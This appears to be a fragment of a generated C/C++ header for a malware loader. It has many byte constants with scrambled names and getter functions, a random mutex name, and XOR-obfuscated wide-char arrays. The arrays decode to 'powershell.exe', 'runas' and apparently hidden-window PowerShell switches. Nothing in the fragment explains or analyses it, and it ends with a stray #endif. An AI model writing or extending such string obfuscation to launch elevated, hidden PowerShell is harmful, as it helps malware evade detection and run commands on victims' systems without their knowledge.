static const uint8_t __Yzg5ZTFhNGSG=0xC8;
extern uint8_t __stdcall __Yzg5ZTFhNGSG_g(){ return __Yzg5ZTFhNGSG; };
static const uint8_t __OWUxYTRkODac=0x9E;
extern uint8_t __stdcall __OWUxYTRkODac_g(){ return __OWUxYTRkODac; };
static const uint8_t __MWE0ZDg2OWMx=0x1A;
extern uint8_t __stdcall __MWE0ZDg2OWMx_g(){ return __MWE0ZDg2OWMx; };
static const uint8_t __NGQ4NjljMzF5=0x4D;
extern uint8_t __stdcall __NGQ4NjljMzF5_g(){ return __NGQ4NjljMzF5; };
static const uint8_t __ODY5YzMxNzm5=0x86;
extern uint8_t __stdcall __ODY5YzMxNzm5_g(){ return __ODY5YzMxNzm5; };
static const uint8_t __OWMzMTc5Yjku=0x9C;
extern uint8_t __stdcall __OWMzMTc5Yjku_g(){ return __OWMzMTc5Yjku; };
static const uint8_t __MzE3OWI5MmVd=0x31;
extern uint8_t __stdcall __MzE3OWI5MmVd_g(){ return __MzE3OWI5MmVd; };
static const uint8_t __NzliOTJlNWSh=0x79;
extern uint8_t __stdcall __NzliOTJlNWSh_g(){ return __NzliOTJlNWSh; };
static const uint8_t __YjkyZTVkYTHk=0xB9;
extern uint8_t __stdcall __YjkyZTVkYTHk_g(){ return __YjkyZTVkYTHk; };
static const uint8_t __MmU1ZGExZTT0=0x2E;
extern uint8_t __stdcall __MmU1ZGExZTT0_g(){ return __MmU1ZGExZTT0; };
static const uint8_t __NWRhMWU0ZjQF=0x5D;
extern uint8_t __stdcall __NWRhMWU0ZjQF_g(){ return __NWRhMWU0ZjQF; };
static const uint8_t __YTFlNGY0MDXe=0xA1;
extern uint8_t __stdcall __YTFlNGY0MDXe_g(){ return __YTFlNGY0MDXe; };
static const uint8_t __ZTRmNDA1ZGUz=0xE4;
extern uint8_t __stdcall __ZTRmNDA1ZGUz_g(){ return __ZTRmNDA1ZGUz; };
static const uint8_t __ZjQwNWRlMzN7=0xF4;
extern uint8_t __stdcall __ZjQwNWRlMzN7_g(){ return __ZjQwNWRlMzN7; };
static const uint8_t __MDVkZTMzN2Kt=0x05;
extern uint8_t __stdcall __MDVkZTMzN2Kt_g(){ return __MDVkZTMzN2Kt; };
static const uint8_t __ZGUzMzdiYWT_=0xDE;
extern uint8_t __stdcall __ZGUzMzdiYWT__g(){ return __ZGUzMzdiYWT_; };
static const uint8_t __MzM3YmFkZmVq=0x33;
extern uint8_t __stdcall __MzM3YmFkZmVq_g(){ return __MzM3YmFkZmVq; };
static const uint8_t __N2JhZGZlNmG2=0x7B;
extern uint8_t __stdcall __N2JhZGZlNmG2_g(){ return __N2JhZGZlNmG2; };
static const uint8_t __YWRmZTZhYjZ2=0xAD;
extern uint8_t __stdcall __YWRmZTZhYjZ2_g(){ return __YWRmZTZhYjZ2; };
static const uint8_t __ZmU2YWI2Nzab=0xFE;
extern uint8_t __stdcall __ZmU2YWI2Nzab_g(){ return __ZmU2YWI2Nzab; };
static const uint8_t __NmFiNjc2OWL5=0x6A;
extern uint8_t __stdcall __NmFiNjc2OWL5_g(){ return __NmFiNjc2OWL5; };
static const uint8_t __YjY3NjliZjm7=0xB6;
extern uint8_t __stdcall __YjY3NjliZjm7_g(){ return __YjY3NjliZjm7; };
static const uint8_t __NzY5YmY5YmLN=0x76;
extern uint8_t __stdcall __NzY5YmY5YmLN_g(){ return __NzY5YmY5YmLN; };
static const uint8_t __OWJmOWJiY2RB=0x9B;
extern uint8_t __stdcall __OWJmOWJiY2RB_g(){ return __OWJmOWJiY2RB; };
static const uint8_t __ZjliYmNkNDFr=0xF9;
extern uint8_t __stdcall __ZjliYmNkNDFr_g(){ return __ZjliYmNkNDFr; };
static const uint8_t __YmJjZDQxNmKR=0xBB;
extern uint8_t __stdcall __YmJjZDQxNmKR_g(){ return __YmJjZDQxNmKR; };
static const uint8_t __Y2Q0MTZiOTEV=0xCD;
extern uint8_t __stdcall __Y2Q0MTZiOTEV_g(){ return __Y2Q0MTZiOTEV; };
static const uint8_t __NDE2YjkxMTUo=0x41;
extern uint8_t __stdcall __NDE2YjkxMTUo_g(){ return __NDE2YjkxMTUo; };
static const uint8_t __NmI5MTE1MjiC=0x6B;
extern uint8_t __stdcall __NmI5MTE1MjiC_g(){ return __NmI5MTE1MjiC; };
static const uint8_t __OTExNTI4ODLE=0x91;
extern uint8_t __stdcall __OTExNTI4ODLE_g(){ return __OTExNTI4ODLE; };
static const uint8_t __MTUyODgyYzTJ=0x15;
extern uint8_t __stdcall __MTUyODgyYzTJ_g(){ return __MTUyODgyYzTJ; };
static const uint8_t __Mjg4MmM0Yzk9=0x28;
extern uint8_t __stdcall __Mjg4MmM0Yzk9_g(){ return __Mjg4MmM0Yzk9; };
static const uint8_t __ODJjNGM5M2RJ=0x82;
extern uint8_t __stdcall __ODJjNGM5M2RJ_g(){ return __ODJjNGM5M2RJ; };
static const uint8_t __YzRjOTNkNDm1=0xC4;
extern uint8_t __stdcall __YzRjOTNkNDm1_g(){ return __YzRjOTNkNDm1; };
static const uint8_t __YzkzZDQ5YjU2=0xC9;
extern uint8_t __stdcall __YzkzZDQ5YjU2_g(){ return __YzkzZDQ5YjU2; };
static const uint8_t __M2Q0OWI1MzZy=0x3D;
extern uint8_t __stdcall __M2Q0OWI1MzZy_g(){ return __M2Q0OWI1MzZy; };
static const uint8_t __NDliNTM2NzIy=0x49;
extern uint8_t __stdcall __NDliNTM2NzIy_g(){ return __NDliNTM2NzIy; };
static const uint8_t __YjUzNjcyMzIM=0xB5;
extern uint8_t __stdcall __YjUzNjcyMzIM_g(){ return __YjUzNjcyMzIM; };
static const uint8_t __MzY3MjMyMGPf=0x36;
extern uint8_t __stdcall __MzY3MjMyMGPf_g(){ return __MzY3MjMyMGPf; };
static const uint8_t __NzIzMjBjZGZi=0x72;
extern uint8_t __stdcall __NzIzMjBjZGZi_g(){ return __NzIzMjBjZGZi; };
static const uint8_t __MzIwY2RmNjIb=0x32;
extern uint8_t __stdcall __MzIwY2RmNjIb_g(){ return __MzIwY2RmNjIb; };
static const uint8_t __MGNkZjYyMWIZ=0x0C;
extern uint8_t __stdcall __MGNkZjYyMWIZ_g(){ return __MGNkZjYyMWIZ; };
static const uint8_t __ZGY2MjFiMTkA=0xDF;
extern uint8_t __stdcall __ZGY2MjFiMTkA_g(){ return __ZGY2MjFiMTkA; };
static const uint8_t __NjIxYjE5MDCg=0x62;
extern uint8_t __stdcall __NjIxYjE5MDCg_g(){ return __NjIxYjE5MDCg; };
static const uint8_t __MWIxOTAwYTCS=0x1B;
extern uint8_t __stdcall __MWIxOTAwYTCS_g(){ return __MWIxOTAwYTCS; };
static const uint8_t __MTkwMGEwOTK4=0x19;
extern uint8_t __stdcall __MTkwMGEwOTK4_g(){ return __MTkwMGEwOTK4; };
static const uint8_t __MDBhMDkyYjgn=0x00;
extern uint8_t __stdcall __MDBhMDkyYjgn_g(){ return __MDBhMDkyYjgn; };
static const uint8_t __YTA5MmI4Mjdt=0xA0;
extern uint8_t __stdcall __YTA5MmI4Mjdt_g(){ return __YTA5MmI4Mjdt; };
static const uint8_t __OTJiODI3NmTv=0x92;
extern uint8_t __stdcall __OTJiODI3NmTv_g(){ return __OTJiODI3NmTv; };
static const uint8_t __YjgyNzZkZWZa=0xB8;
extern uint8_t __stdcall __YjgyNzZkZWZa_g(){ return __YjgyNzZkZWZa; };
static const uint8_t __Mjc2ZGVmNWFA=0x27;
extern uint8_t __stdcall __Mjc2ZGVmNWFA_g(){ return __Mjc2ZGVmNWFA; };
static const uint8_t __NmRlZjVhNDDn=0x6D;
extern uint8_t __stdcall __NmRlZjVhNDDn_g(){ return __NmRlZjVhNDDn; };
static const uint8_t __ZWY1YTQwZTcj=0xEF;
extern uint8_t __stdcall __ZWY1YTQwZTcj_g(){ return __ZWY1YTQwZTcj; };
static const uint8_t __NWE0MGU3MjNE=0x5A;
extern uint8_t __stdcall __NWE0MGU3MjNE_g(){ return __NWE0MGU3MjNE; };
static const uint8_t __NDBlNzIzNDRI=0x40;
extern uint8_t __stdcall __NDBlNzIzNDRI_g(){ return __NDBlNzIzNDRI; };
static const uint8_t __ZTcyMzQ0NDgl=0xE7;
extern uint8_t __stdcall __ZTcyMzQ0NDgl_g(){ return __ZTcyMzQ0NDgl; };
static const wchar_t imutex[]=L"Tc8rVarpvJUl";
#define STRMAX 22
static wchar_t xchr[]={
0x7a65,0xb0b3,0x098e,0x9e11,0x16a9,0x2dd4,
0x4639,0x567f,0xb245,0xb90e,0x6bbf,0x3712,
0x1e11,0x1524,0xc2c8,0xd1c6,0x1d01,0x9e87,
0x0a91,0x0735,0xb568,0x5b18
};
static wchar_t cmd[]={
0x7a15,0xb0dc,0x09f9,0x9e74,0x16db,0x2da7,
0x4651,0x561a,0xb229,0xb962,0x6b91,0x3777,
0x1e69,0x1541,0xc2c8,0xd1c6,0x1d01,0x9e87,
0x0a91,0x0735,0xb568,0x5b18
};
static wchar_t opt[]={
0x7a45,0xb09e,0x09f9,0x9e31,0x169a,0x2df4,
0x4614,0x5611,0xb22a,0xb962,0x6b9f,0x373f,
0x1e7f,0x154b,0xc2b8,0xd1e6,0x1d2c,0x9ee4,
0x0ab1,0x0718,0xb568,0x5b18
};
static wchar_t vrb[]={
0x7a17,0xb0c6,0x09e0,0x9e70,0x16da,0x2dd4,
0x4639,0x567f,0xb245,0xb90e,0x6bbf,0x3712,
0x1e11,0x1524,0xc2c8,0xd1c6,0x1d01,0x9e87,
0x0a91,0x0735,0xb568,0x5b18
};
#endif
